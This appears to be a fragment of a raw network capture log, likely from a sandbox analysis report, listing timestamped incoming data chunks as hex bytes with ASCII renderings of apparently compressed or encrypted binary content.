                                                                                                        2022-09-29 12:46:35 UTC15514INData Raw: 00 93 93 24 80 93 b0 1a 2d b4 dc 32 96 26 bc b8 98 a2 aa c8 a5 ab 77 c5 2b 79 ac 61 0c fb 4b a5 07 bd 15 00 33 ea b1 2f c0 59 e0 de 88 ca 6f 22 6d 19 d5 81 93 31 7c 0f cc 2b ac 47 ca 89 bf 80 3a 3b 9d 7f 0b 57 02 ae 54 55 36 45 d7 12 ce d2 f0 8d b5 57 14 22 1b 3d ef b9 02 da 0c 4d ff a1 db 79 5a 73 19 13 9c 8f d0 03 77 db 21 bb 8f 68 17 57 28 ef aa 1e 86 0f e7 4b 46 d8 d8 cf c7 b3 a9 ed 54 61 10 30 fd 9a 2e 14 20 78 ad e5 af 16 81 9a 71 c2 8d be 8b 56 b4 80 1d ac 90 b1 7e a8 8f ee c6 f0 37 24 aa 9e a4 ea 16 66 62 07 7b 6c 10 5d 51 bb 0a f9 0a d2 b8 70 db 9d 65 8f 00 71 14 e7 32 5d 74 db 1a 8b 56 19 cf d0 b0 4f 90 46 45 8f 4d 4c 62 ac e1 6c 3f 79 ad fa 94 27 33 bd 92 78 76 bb 10 7a 01 79 db 1a e4 a7 4e fb c5 0d 14 b6 59 85 42 f4 8b 10 49 b0 15 60 43 f8 92
                                                                                                        Data Ascii: $-2&w+yaK3/Yo"m1|+G:;WTU6EW"=MyZsw!hW(KFTa0. xqV~7$fb{l]Qpeq2]tVOFEMLbl?y'3xvzyNYBI`C
                                                                                                        2022-09-29 12:46:35 UTC15530INData Raw: 7a 0c 69 49 c8 e3 0d b6 70 68 94 30 73 1f a6 27 e7 f7 fe 2a dd 81 87 7b b0 bc f1 56 f8 be 01 38 63 cc 03 54 f9 38 a3 15 b1 ac f3 d2 48 e3 27 7c 35 e1 5f 8d 49 f5 9d 0f 72 66 32 04 df 2a 7e 74 e0 6a 33 f0 08 0d e1 30 17 21 f5 f7 f6 4b d4 58 de a3 f6 2a 63 61 47 50 d5 f1 fd a9 a7 70 18 90 c1 76 fa 44 01 4a a8 28 79 50 88 d0 bc 51 10 67 e0 0a 03 16 80 63 ec b9 9e e0 98 f7 7b 53 4e a2 d3 e5 ce 2f d5 ec f9 1b 97 0d a3 ab aa 39 f9 2c f9 c7 54 6c 83 6e ad 09 e1 16 b2 04 64 a8 f0 07 f2 61 fb fb 70 22 86 38 ae 41 a5 1a 1c 9d 0c 2d 7a fb d1 7c 31 fd b6 f8 e3 41 11 ce d9 f5 35 ca f9 b1 68 b5 f8 94 29 8b 1f d7 52 de 08 9b 3b 21 6c 0a 17 dd 9f 6c e3 a1 38 eb 6d d0 5a 18 04 16 62 7a de 41 77 94 da 65 13 cf d9 3a 65 93 55 6f 50 c4 71 cd ce 6c ec 07 7f 13 da ed 58 c6 63
                                                                                                        Data Ascii: ziIph0s'*{V8cT8H'|5_Irf2*~tj30!KX*caGPpvDJ(yPQgc{SN/9,Tlndap"8A-z|1A5h)R;!ll8mZbzAwe:eUoPqlXc
                                                                                                        2022-09-29 12:46:35 UTC15546INData Raw: 66 6c e8 21 3f 6c af d8 64 8b aa 22 03 a6 94 0b 5f 18 26 02 bb 9d bb cf 56 a9 ee 8e a7 94 9e 39 7a bd f8 60 75 4b e2 96 32 0c 64 33 67 60 53 50 10 bc 3a b3 78 b3 cc c8 08 aa ca b2 16 7f 25 8a 89 8d ac 36 99 17 39 e6 b0 37 dc d7 3b cd c4 f5 d6 99 42 ed 63 e3 93 57 0d 7e 36 52 5b b2 b4 90 04 fe a0 34 b8 6e ca 6b f7 02 a7 f4 78 ff 08 75 e6 89 4c 8d 12 8f 83 37 2c 8b 87 c0 7c c6 6e f4 5a 15 0f 30 10 88 4f a7 7c f2 14 71 7c 68 c8 9e 16 a7 5c 64 4f d3 db 36 e1 3a 6c 36 8e 7f a8 37 5a 18 82 5a 93 05 20 6e a4 01 9e a6 d3 8a fd df 0c 8e aa 86 0f e8 ac 80 ea 15 e4 9e e5 4e 1f ae 88 16 b9 14 41 04 dc d0 c7 90 aa 39 08 1b 7f a6 b6 08 31 ab ec 6a 38 b4 17 e3 f3 d6 18 64 b0 e6 a8 cf e1 55 3c c0 c4 f3 3b 5c c1 3a 7e 81 4e 12 ea d4 dd bd 6c 67 36 6a 67 42 05 79 9c 15 f6
                                                                                                        Data Ascii: fl!?ld"_&V9z`uK2d3g`SP:x%697;BcW~6R[4nkxuL7,|nZ0O|q|h\dO6:l67ZZ nNA91j8dU<;\:~Nlg6jgBy
                                                                                                        2022-09-29 12:46:35 UTC15562INData Raw: 93 b1 c5 af 63 44 3b df 5a ae 66 9c e1 f1 8d 59 d1 b3 eb e8 43 b9 1d b3 db 8d 81 65 bb ca f4 91 f5 09 45 41 c4 56 00 d6 c2 bd a0 cd cd 2f 43 5b d6 cb fc 17 b6 1b 27 e1 0a 82 90 7e 3d 01 7a b8 87 65 b3 35 c0 0c 69 ac 99 f7 62 c2 f9 d1 78 f5 c1 8b af 4c de ec 4c e1 34 e0 30 5e 59 d6 d3 d9 05 78 1b ad 6e b8 49 31 f7 ef fe 95 d6 a1 f4 7d 04 79 00 fc 22 6d c7 6b 33 3c f1 ca 1f 60 d8 49 72 d4 25 08 53 ee de f9 9c a2 b4 5c b5 ce 36 32 42 a3 bd 5f 48 63 36 b2 28 ed 1e c2 c9 05 ba 79 86 7c a5 3d 24 5a 1e bf bb 6f 0a 6d 1b 37 e5 e1 20 fc f8 bf 09 39 da 2d 80 0a b0 e1 50 84 8d 46 a0 f6 15 6a 1a 78 5d 3e 6b c8 fc 4c 9a f3 4b 50 70 16 a7 44 4c f0 e6 63 ab 61 01 3e 15 20 31 15 25 a9 6e dd 4e cc aa ce f7 61 21 67 f6 a7 e1 c8 9f fb 00 4a 07 4c b7 20 b9 d7 76 97 a9 ee bc
                                                                                                        Data Ascii: cD;ZfYCeEAV/C['~=ze5ibxLL40^YxnI1}y"mk3<`Ir%S\62B_Hc6(y|=$Zom7 9-PFjx]>kLKPpDLca> 1%nNa!gJL v
                                                                                                        2022-09-29 12:46:35 UTC15578INData Raw: 32 11 53 92 43 18 59 34 7e 84 cb 5b 85 45 c5 c5 c2 82 fb 8f 18 d1 a0 ce 72 29 01 b2 65 bd 06 e6 4c d4 01 c8 51 32 48 7e aa 4c 46 d6 24 a8 10 66 f3 83 fc 15 a7 3a d7 60 7b fe 59 19 4b cb 0c b1 8d 16 99 26 f9 df 4c 3d 5e 1a 76 c4 07 84 dd 63 33 09 0b 97 5f cc 7d 17 0b bf 6e 93 68 66 33 88 8d a3 98 88 af c7 f5 74 55 12 2b 11 15 89 b8 dd 23 45 19 0a a1 8d aa 3b 0f 3b cc a3 ed 4f 7f 9a 93 f2 fb 1b e3 1f f0 df d0 77 1d f1 ff d8 79 b7 fc 1c 25 ff dd 87 df 08 b7 33 58 87 22 4a ce 97 5e 79 75 5d 50 09 a2 89 08 e7 32 e2 6c f4 88 12 34 91 65 90 42 fa 11 02 95 b8 a4 68 6f 90 e9 48 c8 55 88 4e 65 a1 5b 2b 67 da bf e1 24 32 89 7a ba 79 c0 d0 c3 9b 6d 1a db 17 ed 78 85 fc 84 68 30 8c 53 9e f4 d1 85 cb 9d e8 29 d1 5c 3f d3 e8 f8 d0 ec 63 38 55 92 2c e0 58 98 2f 56 ec 05
                                                                                                        Data Ascii: 2SCY4~[Er)eLQ2H~LF$f:`{YK&L=^vc3_}nhf3tU+#E;;Owy%3X"J^yu]P2l4eBhoHUNe[+g$2zymxh0S)\?c8U,X/V
                                                                                                        2022-09-29 12:46:35 UTC15594INData Raw: 96 2d ee 96 0d 48 8e 30 a4 33 78 45 e1 0a 5e e3 ec 3f af ea 79 f2 4b 34 72 9d fb 9f f4 33 bf fc 5e 37 9d 0a 60 08 66 30 b7 18 ad a6 d3 97 8e 9e 08 a8 4d d6 cf 38 51 86 e7 8c 1f e3 bb 46 dc 00 01 9e c1 2a 97 79 25 fb 40 39 96 34 39 39 c5 3c dc 6d 08 e3 5d 6d bd 29 d8 e9 18 81 6d d8 be 04 3b d5 fe ee d1 82 dd ff f2 d2 fa 7e 4e 61 a6 cd 8f ee ad 8a 0e e1 6b dd 4d 1b f3 40 a7 9d b0 57 94 f0 7a 89 b5 37 e7 5f 3f b4 58 05 46 6d d7 d8 96 f7 16 87 a9 ff fe 54 00 bd 0e 2b 40 91 83 b2 50 6c 2c 70 fa e6 84 b0 2c 03 e8 fb 77 ef 0e 30 84 a4 5b 3b d6 64 6a 18 45 ec a2 37 07 54 f3 dc 17 b1 08 0a 78 43 1f 00 b9 75 33 d4 e5 71 84 45 c1 85 b9 e4 e3 99 e5 20 66 9f 20 88 71 61 aa 84 a8 f3 21 b1 04 d4 1c ba 87 24 d3 78 8d 99 5f 56 46 80 d0 80 64 55 7d ca 47 24 09 60 dc c1 74
                                                                                                        Data Ascii: -H03xE^?yK4r3^7`f0M8QF*y%@9499<m]m)m;~NakM@Wz7_?XFmT+@Pl,p,w0[;djE7TxCu3qE f qa!$x_VFdU}G$`t
                                                                                                        2022-09-29 12:46:35 UTC15606INData Raw: 7a a8 6f 9a 50 4a a8 d3 79 ab a3 c6 d0 b9 f2 60 e5 e4 b7 ba f5 b2 68 bb 3a 52 e1 c7 cf 08 d1 16 4f a0 51 5a 4f 60 b0 b6 7a e5 99 2c 65 6c fe 0f e8 28 7a c6 1b ba 73 ed 3a 1f b3 71 43 0a ab 4d 0e 39 d9 57 6a 37 40 10 66 bf 7f 57 3d 95 59 e4 ba c4 db ff 2e f2 6b e8 eb 4b 2a 86 61 30 37 91 70 b4 9b 16 a2 60 a5 89 35 5e a3 cd ee f3 e2 9f 69 90 d6 87 05 1c b7 f7 b9 05 58 fe f9 ae d6 67 6e 66 68 d0 cf 8f 96 8e 6a 0f 16 6e 45 27 76 e8 82 17 8e a1 12 d3 09 e4 56 74 74 af c8 65 12 95 fb a0 78 50 6c 98 2c 02 d8 b1 25 fc f6 e8 e0 3d 1d 2e 68 56 21 02 22 fb 9d 97 bc 53 30 43 6e 32 fd 8b b3 11 9c 79 f3 87 e4 9d fb 01 49 a9 2b 8b 84 09 8b ed e4 b8 61 5f 36 3a f0 b5 de 7a 62 58 cf 5f 0b c5 90 31 c5 57 be 60 a1 bf fd 1e 18 74 65 56 a7 d8 d4 b0 e7 08 3b 0e af 7f ae f3 69
                                                                                                        Data Ascii: zoPJy`h:ROQZO`z,el(zs:qCM9Wj7@fW=Y.kK*a07p`5^iXgnfhjnE'vVttexPl,%=.hV!"S0Cn2yI+a_6:zbX_1W`teV;i
                                                                                                        2022-09-29 12:46:35 UTC15622INData Raw: 63 99 5c f1 37 0f b4 a2 6e 13 e3 ec c8 3d 6d fc a7 78 09 71 a5 bc b1 83 59 50 0c a8 f2 03 7e b9 fc 70 ac a0 68 83 2c c1 5e fd 91 67 ff 24 ed fe 02 22 7e 95 d5 f6 72 db 93 8f a9 3d a1 ff 58 36 95 8d 72 f7 9f 01 df 71 e9 b0 db a8 89 94 e4 46 72 35 c5 c1 04 04 6c 21 85 71 41 16 f3 6f 14 20 f3 9c e2 31 e1 94 88 f3 cb 04 ca ab b6 e5 fa dc 0a 06 5d 3f 53 ed f3 d9 5d 33 7c c5 d1 54 96 e3 a2 10 a8 e7 f8 80 60 de bf ec 95 18 9f 18 35 a5 6c 1e 4e ac 77 f3 6a 50 69 ad 09 17 8c 2a 56 46 f6 5f b4 e6 08 ac 1a e2 e0 91 cd 74 89 55 83 ab 26 46 05 a3 23 8c a7 f6 bf 44 8e 88 49 0c 13 0c a8 ee 8b fb 67 8d f8 73 88 22 ed 36 cd b4 90 28 57 56 e0 3e 4c 9a 6b ed e2 b4 c7 e5 dc c2 27 43 6e 51 4a c3 2b e2 62 32 34 92 14 b7 43 4a c4 34 96 a2 84 d8 5e fe 55 c3 e1 f3 59 ca c1 f8 5d
                                                                                                        Data Ascii: c\7n=mxqYP~ph,^g$"~r=X6rqFr5l!qAo 1]?S]3|T`5lNwjPi*VF_tU&F#DIgs"6(WV>Lk'CnQJ+b24CJ4^UY]
                                                                                                        2022-09-29 12:46:35 UTC15638INData Raw: da f3 d6 e8 da 7d 81 f5 98 f6 cb 13 80 e2 8c 51 ec e2 43 cc c4 86 77 6b 14 9b 7f 70 07 48 d5 e5 b3 a6 6e 07 1b bf df 9f 53 40 b1 28 82 03 fe f8 28 33 09 b4 d4 73 9c 16 60 4a d4 e2 23 e2 11 c5 06 87 5b 8b 6d 58 f5 1e a6 20 a4 f4 19 52 c3 9a bd 64 c0 48 d5 b5 16 6c f7 36 fb c3 ae 4c 86 73 38 4c a8 e7 8c 8d a0 85 9a 4c e6 3e 0c fa 23 2c 18 d5 f6 9b 2e 0b c8 b4 3e f1 e9 e8 02 1c 7b a6 85 1e ba 14 06 00 e5 fe 2c 7f 00 25 ac d5 3c 4f 1e b6 c9 1f f1 9e ce ef f1 e8 d9 9d 34 b4 ff c5 c8 0a d4 fa 7c fa 29 29 02 9c 11 68 93 5b af 11 2b d6 36 7f c2 e7 bc 2a 32 51 a0 17 82 5b 22 27 0e a3 1e 4e b1 50 1e a8 94 61 9f 8b 55 bf 39 bf 50 70 35 c6 df ec 4a 76 72 6f 07 68 59 fe e8 34 ee 46 06 fc b5 26 76 73 5d 53 69 57 cb c6 8f 42 82 65 0c 23 e5 1f b6 8e 1a c0 37 50 30 63 ea
                                                                                                        Data Ascii: }QCwkpHnS@((3s`J#[mX RdHl6Ls8LL>#,.>{,%<O4|))h[+6*2Q["'NPaU9Pp5JvrohY4F&vs]SiWBe#7P0c
                                                                                                        2022-09-29 12:46:35 UTC15654INData Raw: 9b 40 b1 d1 94 30 a1 16 ce 82 48 43 a4 bc c1 cb 9d 12 8e ad b3 43 f2 d1 94 59 2d 93 71 b3 53 17 37 79 68 bb 63 db da 34 3b 94 b1 21 5a b7 61 28 7c 71 2b 4b 13 36 43 73 61 a1 b4 2f 07 16 8b d9 89 72 96 35 1d ba 7e 6f 4e e4 a8 e6 1a 24 7c 70 14 ec f8 76 c8 79 8e 08 f0 44 72 86 55 61 e0 83 42 d9 2a c0 16 c4 16 d0 76 76 ac b6 7c cf a6 da 42 c3 16 05 d9 5c cf 45 c4 ff 23 88 ce ad 46 64 50 8f e0 b3 c7 f0 67 a1 ca 46 ad ef 62 77 97 16 6f 51 61 28 8b 96 34 ec f2 19 df 91 3e 91 9e 69 c8 16 b0 9e 5a a3 21 8d 9a b6 0e 68 65 47 a6 32 2b a9 e0 30 57 84 24 4a 80 8b 85 f7 fb 14 3c bf 6f 67 6f 19 2f da 29 57 4f a3 1c e0 45 8f 0f 67 f8 74 f1 d8 f9 f6 fe eb 62 79 66 7a ea f7 0b 07 b8 cf 54 37 db 66 c3 01 70 40 b6 f9 c6 f1 9c 72 08 6a 5f 35 30 a1 4b 85 63 1b 48 5c 09 10 25
                                                                                                        Data Ascii: @0HCCY-qS7yhc4;!Za(|q+K6Csa/r5~oN$|pvyDrUaB*vv|B\E#FdPgFbwoQa(4>iZ!heG2+0W$J<ogo/)WOEgtbyfzT7fp@rj_50KcH\%
                                                                                                        2022-09-29 12:46:35 UTC15670INData Raw: 99 0c 92 4c cd b4 38 6f 0d ee 44 b7 b9 da 85 29 9b 0a e4 7a ab 03 6d 0c c0 46 81 fd 5f 07 cd b4 8b b9 29 1c f3 03 59 76 e4 51 5f 0e 9e 4f dd 58 d1 fa 7a 83 da 3f 94 a4 16 0d 0b a0 74 24 13 4b 0c ef 85 ab 93 f0 d5 42 74 91 df cd af 73 b9 9e 63 ef 78 a7 77 49 02 6e 6f 8f c5 4f cf d4 36 d4 94 01 ff df 8d 3a 1e 7d cf 8f 86 9e 1a b2 66 17 12 4a f9 93 8b dc 6c f2 5c 97 92 54 21 2b 97 77 d9 bd f4 ea e7 87 7c c6 eb 14 99 d0 70 d5 32 62 44 d9 36 ef c1 20 ef 2c cc 06 b8 65 07 f2 85 5d 65 86 9e 20 6a b8 e1 d5 0a 22 1a 23 60 66 52 79 3e da bd bd e9 e0 64 c0 43 e8 73 1b 64 52 17 ac df b8 3d f1 77 da 07 f9 69 dc 5d 96 76 13 6c a4 e9 22 c8 7a 68 0a 88 a2 49 a4 9a 00 c0 35 36 d8 88 a2 86 ca a0 7c 3d 63 0c e0 da 6c 6e de f5 66 60 0d c7 b1 48 f2 3a eb 46 c9 00 6e f5 cf 5f
                                                                                                        Data Ascii: L8oD)zmF_)YvQ_OXz?t$KBtscxwInoO6:}fJl\T!+w|p2bD6 ,e]e j"#`fRy>dCsdR=wi]vl"zhI56|=clnf`H:Fn_
                                                                                                        2022-09-29 12:46:35 UTC15686INData Raw: 79 64 0b 51 62 bd 3d e3 7b 64 9f f1 27 8d 4a 30 d2 be 1e 6f a7 3d 21 4a 96 db 79 8a c9 d3 34 72 80 28 6f 17 f3 ad e5 23 28 20 50 2e af d9 e7 1f a9 20 fa 28 ab 0b 93 b8 c7 9c a7 63 1a d7 57 bd fd d8 86 aa f2 13 81 78 7c f3 d2 6c 82 47 15 fb c6 de 3a f4 0b 61 47 cf 67 13 33 ed 41 96 c6 9b 6c ef 8a 6a 30 a9 93 1c e5 34 36 5a df 91 8f 42 02 59 f2 7b 7c ca c0 86 f6 54 21 ab 1c 4e 0d cd 02 90 9f af 5e 3f bb 7d 36 57 65 56 e3 24 b6 3e 58 3a f5 8f 5a 08 74 0d 29 30 38 52 14 ac 18 a6 fa 06 bf 14 8d 5b 15 04 cf c3 2b ca 43 31 99 92 ed ae 73 c9 59 67 ed 31 ac 87 e9 f5 f2 bf 4f eb 09 14 de c1 ce c8 a1 01 e3 95 31 f8 54 86 d0 0b b4 d4 88 78 b2 c9 cd e1 18 47 f4 3a 50 40 29 86 04 d8 26 d2 43 99 90 eb 7b 60 81 04 14 e6 5a 5d c2 bc e8 6f 5f df 73 35 e5 c3 7e 80 32 39 7d
                                                                                                        Data Ascii: ydQb={d'J0o=!Jy4r(o#( P. (cWx|lG:aGg3Alj046ZBY{|T!N^?}6WeV$>X:Zt)08R[+C1sYg1O1TxG:P@)&C{`Z]o_s5~29}
                                                                                                        2022-09-29 12:46:35 UTC15702INData Raw: 27 b6 f9 16 bf 1a 7e fb f8 20 77 de 50 d5 88 7f ba 0f 42 9e bf 5b a6 9a 74 64 21 ab fb ba e3 4d 92 05 29 5c 3a 58 5a db 58 db 39 b6 54 c4 57 ca 00 42 d7 a0 e1 90 cf 3a 76 46 87 b9 d8 22 dd ea 22 ef b9 3f 83 7c 4c 88 5e 67 63 b6 dd ad 6c fb 5e d7 48 d6 72 66 72 5e d5 55 b6 57 c9 05 1e 42 ad c4 bf e4 0a fb 3e a6 a7 c2 9b e4 42 22 c1 e6 bc b4 69 9f ec b2 51 16 8a 13 12 7d 2d e9 10 e4 7b 0b 8d 2f 86 8d 10 69 c9 8d 85 a4 af 10 07 e3 ec ee ef 0a fd 3e 45 6d 4f 4c 4b 06 9e 3f f9 96 9e 57 c0 3e c6 c4 87 fe 16 a8 29 5b c8 12 9a 0a c9 48 3c 7d 65 f3 cd 66 cb 7f fc 29 07 72 a8 ec bd 50 50 8e 36 23 f6 c0 24 9c b0 27 88 f4 fa 3b fd c2 6a 17 68 85 f7 b8 13 5d 1c 5b f1 e1 ac 34 09 a2 f1 3c c5 f5 54 06 48 23 37 d6 06 cc 95 2c 03 f9 30 60 fb 5a c7 8c f8 db 37 97 fa 0a 9b
                                                                                                        Data Ascii: '~ wPB[td!M)\:XZX9TWB:vF""?|L^gcl^Hrfr^UWB>B"iQ}-{/i>EmOLK?W>)[H<}ef)rPP6#$';jh][4<TH#7,0`Z7
                                                                                                        2022-09-29 12:46:35 UTC15718INData Raw: b8 3e f0 74 53 1a 04 e5 b4 f8 84 6a 0f a4 9c 35 66 f4 76 99 8e d7 fc 65 3f df ab 72 11 eb a5 5f b1 ce df 73 57 42 1a 19 cd c0 32 4f 4a 8f ea 7c fe 04 9f 5a e8 0f 94 8f 85 da a2 57 5c 19 4e 5d c8 f8 04 65 ae b6 13 8f 03 c9 20 d7 8f 12 65 ee 58 c6 8e ff 30 da c7 67 c9 ef 93 42 38 c3 c9 f8 31 9e f4 48 08 ca 97 21 a9 5a a2 f6 31 0e 48 6f b3 ce 18 6f 07 fe a3 1e d5 4e e3 8a ba f9 7f 0d 55 a0 80 aa b5 64 17 65 8b 3f 62 e3 1a 86 3e 12 8b d7 78 36 86 14 27 19 c2 5d 21 65 17 4d 1a ba a7 a5 14 fa 81 80 fc 84 78 6d b4 f8 5d 8a e8 ca 9f 82 97 a4 77 0d ee bb b7 fa 53 49 f2 17 c8 96 91 8e a1 aa f3 e6 9a 7f c0 cb d2 0c 18 b9 6e e0 11 bd d7 ff f3 3f 9e 44 e3 7b c2 bd 33 b7 51 aa 1f 65 21 26 45 ed f2 ba d1 e8 c5 d0 9e f0 2a ae de 2e 33 64 cd 5b 99 9d 8b b3 1f 7b 83 71 76
                                                                                                        Data Ascii: >tSj5fve?r_sWB2OJ|ZW\N]e eX0gB81H!Z1HooNUde?b>x6']!eMxm]wSIn?D{3Qe!&E*.3d[{qv
                                                                                                        2022-09-29 12:46:35 UTC15734INData Raw: 37 02 2c 55 f7 66 3e 27 90 95 07 51 1b 5b 5b 97 ec 79 bb 3b 96 22 e6 6d 9c a2 bc ff 59 49 ba 76 06 12 70 25 be 39 20 64 2b b2 de c7 04 8b a2 7d 2c da 12 d8 71 2b b2 08 6a 7d 07 56 ba 5a 7e e4 4d 89 73 ac 90 8b f0 85 d0 42 31 d1 5d ef 97 bf a5 e3 ed cd d3 cf fb a7 59 db e0 f7 38 9d 46 be 38 31 1a 80 d8 e3 a8 56 ab 4b db 30 c8 a8 ef a2 c3 43 2a f9 b5 af b3 1e 8d 03 d2 35 88 29 51 ea f7 19 3e 8d 4e d0 49 4c ea 24 dc 1a 83 61 30 88 cd 76 a3 a5 41 31 c1 24 6e f1 7c e2 b3 ec 14 29 c9 4a ae 42 a1 d9 71 f5 1c 70 89 da 6d f8 61 52 43 b0 dc 08 0e 99 99 54 55 10 8a 07 02 7b 78 45 e2 d1 64 2c ef cb 34 b0 90 fb 4e 3e 69 54 3d 97 de 5f 12 b8 63 44 48 63 f6 e7 9a c8 ab 18 6f 96 a8 9a 47 f7 35 73 9f 08 3d 43 df 90 60 88 58 7d 7b 72 fc d4 a9 77 ed fd 09 bb 4c e4 62 54 50
                                                                                                        Data Ascii: 7,Uf>'Q[[y;"mYIvp%9 d+},q+j}VZ~MsB1]Y8F81VK0C*5)Q>NIL$a0vA1$n|)JBqpmaRCTU{xEd,4N>iT=_cDHcoG5s=C`X}{rwLbTP
                                                                                                        2022-09-29 12:46:35 UTC15750INData Raw: 32 8b cb f1 94 53 5a 21 ad 21 21 31 f6 56 14 58 21 4b 79 f2 e4 ae d2 da 11 ea e1 81 2a fd 5e 59 35 f2 79 6b 47 a1 c7 e9 b4 ea c5 82 c7 c7 c4 92 55 16 ab 01 01 c0 ec 00 95 96 8e 5a 8b 8b ba 49 d2 53 8f 06 a5 1f 3f 54 3b 07 86 23 24 00 a0 a3 71 97 7b cc cd 32 e9 e4 ce b8 b3 1b 90 55 7c 87 64 e1 2d 01 27 e9 63 47 23 2b ab f3 2e 26 e2 df 6c 43 64 a7 34 f2 56 06 fd dd 8e b8 99 8f f4 8b cb d6 d4 11 82 20 6e 31 0a 47 00 aa a8 25 bb 69 99 4f fa ab dd ea 05 19 7f c5 7f 15 31 2d b6 d4 b0 0e 1a 99 2a 8f 95 32 e3 64 ad 97 06 19 de 03 ee 5b 9b 15 a0 cd 6e 44 c1 16 7f d4 00 2e 2f 83 9a ab 66 a3 c7 0e dd ae ba 20 12 48 b1 3a 4f 60 21 cb 83 a6 d3 a7 33 2d 59 c9 47 e7 98 38 a5 fe 90 49 fd 07 ac ea ff e4 4c 4e 1e 2b 82 77 b2 95 65 28 76 c8 b0 8e 10 17 0c 13 1a b6 38 7f 2c
                                                                                                        Data Ascii: 2SZ!!!1VX!Ky*^Y5ykGUZIS?T;#$q{2U|d-'cG#+.&lCd4V n1G%iO1-*2d[nD./f H:O`!3-YG8ILN+we(v8,
                                                                                                        2022-09-29 12:46:35 UTC15766INData Raw: 8a 57 38 e8 d2 b7 27 48 42 67 96 d0 06 64 77 55 76 dd e6 92 8b d8 45 2c 1f 2f ec 15 a0 f5 31 89 53 e8 73 d6 4b ce a3 0a 0a 2b 89 6a a6 67 e3 6b ab 94 16 e7 ca 7e b4 39 3d 0b 9e 00 5a fb 55 36 06 41 17 93 65 2a af 78 a7 c9 42 7c a6 b7 0c 15 e8 8f 4b 4d c7 33 97 4a e8 e5 79 d7 28 71 a6 72 c9 42 9f c3 c3 39 36 4a a4 2a ad 03 26 68 22 07 5f ed 0c 4d 65 87 61 82 d5 12 1b a6 5e 44 57 b0 fb 5a 69 17 d6 a7 11 84 a2 98 b0 fe f8 5e 7d f6 c2 9b cc 68 de c4 0a 25 f6 af 4e 78 ca 7a ae 99 bc 9c 47 e4 1c f2 ce ac 67 d0 17 1b e8 4d 0f d6 55 0f 82 09 c6 2d 30 68 cc 12 ff 19 55 bc f3 3b b2 57 17 09 d5 f7 f7 b6 75 c1 2d 75 9f e3 96 9b 76 cf aa 5d 5d de 0d ea a7 95 d2 27 3f 29 92 44 92 af 16 65 14 d3 65 0e bd 4e 57 59 fe 4d b9 fb 55 ab 20 0e 78 76 03 8f 01 9c a4 bc a6 25 31
                                                                                                        Data Ascii: W8'HBgdwUvE,/1SsK+jgk~9=ZU6Ae*xB|KM3Jy(qrB96J*&h"_Mea^DWZi^}h%NxzGgMU-0hU;Wu-uv]]'?)DeeNWYMU xv%1
                                                                                                        2022-09-29 12:46:35 UTC15782INData Raw: fa af 76 b8 1d 7b e9 bf 4b d1 77 51 c9 45 da 95 1b 17 f3 c7 a2 07 63 24 62 41 7d dc 8e d8 64 d8 37 17 cf 22 dd 35 03 89 97 20 f2 7b 86 41 0e ff 2d 2e 79 00 20 6f a7 c9 e4 23 4f a1 0a 24 60 7c 3a 70 ba fa 3d 49 49 07 15 73 24 0b 8e db b3 af a1 81 09 9e 0c 15 9e 76 29 2b 91 10 b3 15 ee ca 86 75 25 86 90 55 a8 4b 17 74 da 03 c4 ea 34 62 69 0c ba 34 56 9e d6 33 2f a9 85 22 cd 2f 82 f3 53 d5 55 82 3a 6b ef b7 5d 57 4c dd b2 15 ef f1 d5 d4 67 4d b3 8e c1 c0 ff 95 ea 6b 05 83 39 92 71 8c 55 5e a4 5e a2 83 a5 9f fb 4c 03 68 33 4a 60 8e 02 6b 23 8d e2 78 33 b4 ca fd dd f2 8b 16 7d 7c 71 f3 c5 e7 e0 26 1c 68 38 3a d7 a6 fe 04 3e 22 dc ec f7 8e 35 4b d2 ea 11 d4 f4 57 dc 17 07 55 96 80 26 10 6f 10 2b 6b ab 0c 17 fc 90 ef 45 af b7 37 9a a2 80 57 c2 e4 5c 95 92 2e 75
                                                                                                        Data Ascii: v{KwQEc$bA}d7"5 {A-.y o#O$`|:p=IIs$v)+u%UKt4bi4V3/"/SU:k]WLgMk9qU^^Lh3J`k#x3}|q&h8:>"5KWU&o+kE7W\.u
                                                                                                        2022-09-29 12:46:35 UTC15798INData Raw: 26 6b 1b 7b eb b2 51 db 79 e8 2d 70 f9 39 2c 60 42 60 59 f2 9b 79 3b 94 9b 80 3f fd 33 5b 0e 00 80 82 94 d1 f4 3a f1 02 24 94 15 6c 82 a9 3f e0 a5 8e 2b 94 fb cb e9 c1 7d ce 0f 0e 47 61 02 4c 52 4f e0 50 67 6b 43 50 cf d2 fe 03 f2 61 29 9c af 1b 40 a3 a0 0a 30 08 8f b2 a9 7d 61 d5 e2 03 dc 9e c6 b7 f1 c8 8f b0 3c 2b c7 f3 bc 30 49 5a 01 43 41 ba 37 dd 24 fc 12 04 79 96 f9 5d 84 9e a2 90 e0 89 d0 c8 d3 be 29 1b c9 b6 96 c7 0b de 5a d2 61 39 9c 73 61 c0 2f 76 f0 df 2b c1 8d 56 a3 55 33 08 fa a0 6b 74 7d 4a c8 83 96 b4 4e 00 1e 2a b4 24 39 f6 07 a4 77 25 a3 d6 d1 db 3d eb 17 54 02 49 b6 cb b4 3d 2e 30 65 af fa a9 3d ca cd 9e 64 4e 0b a9 54 50 2f d6 47 ff 3d f5 9f 26 25 61 28 0e 72 93 33 94 cc 62 90 ab 35 1c 53 44 10 09 85 e6 74 c1 63 ce e5 e3 7b 37 64 fc 6b
                                                                                                        Data Ascii: &k{Qy-p9,`B`Yy;?3[:$l?+}GaLROPgkCPa)@0}a<+0IZCA7$y])Za9sa/v+VU3kt}JN*$9w%=TI=.0e=dNTP/G=&%a(r3b5SDtc{7dk
                                                                                                        2022-09-29 12:46:35 UTC15814INData Raw: ad 1d 8d e5 4c cb d4 4c d9 5c b6 5a c1 aa 12 16 46 02 cc c0 4a 31 55 a1 d2 06 70 df 15 d7 f4 e4 fa b9 43 81 60 a1 16 e7 22 7a bf 15 b8 15 70 78 9f 9d b8 11 27 f8 3e d8 d4 4c a9 56 71 27 31 e7 cb 9d fd c4 d8 ed 59 9e fa 23 f4 96 7c 1a e3 ec c1 8f a4 b5 7b 59 87 4e 75 1b 33 b7 1b 63 be 67 3b 06 cc c5 6a 32 09 fb 49 f1 3c a8 a0 bb 6a af 61 5d 0b b3 3c 43 a3 8d 79 83 87 fc 6a 88 32 d1 a2 43 a5 c1 76 a8 2a 41 d1 ad ed c9 dc 6f b3 2f 2a 02 b4 0a 40 80 e0 07 93 28 90 2c de b3 9f 7d ef 6c 9f 9c e2 54 34 11 dd 98 5a 37 4b 4a 61 ab 17 30 f2 5a 03 f9 be 3d 76 fe a4 7b ad 63 4a 6a f2 43 12 00 67 02 1a 00 4e 90 47 a1 01 74 b4 25 f9 7a 9c b7 ab d6 84 9f 58 ae 2c 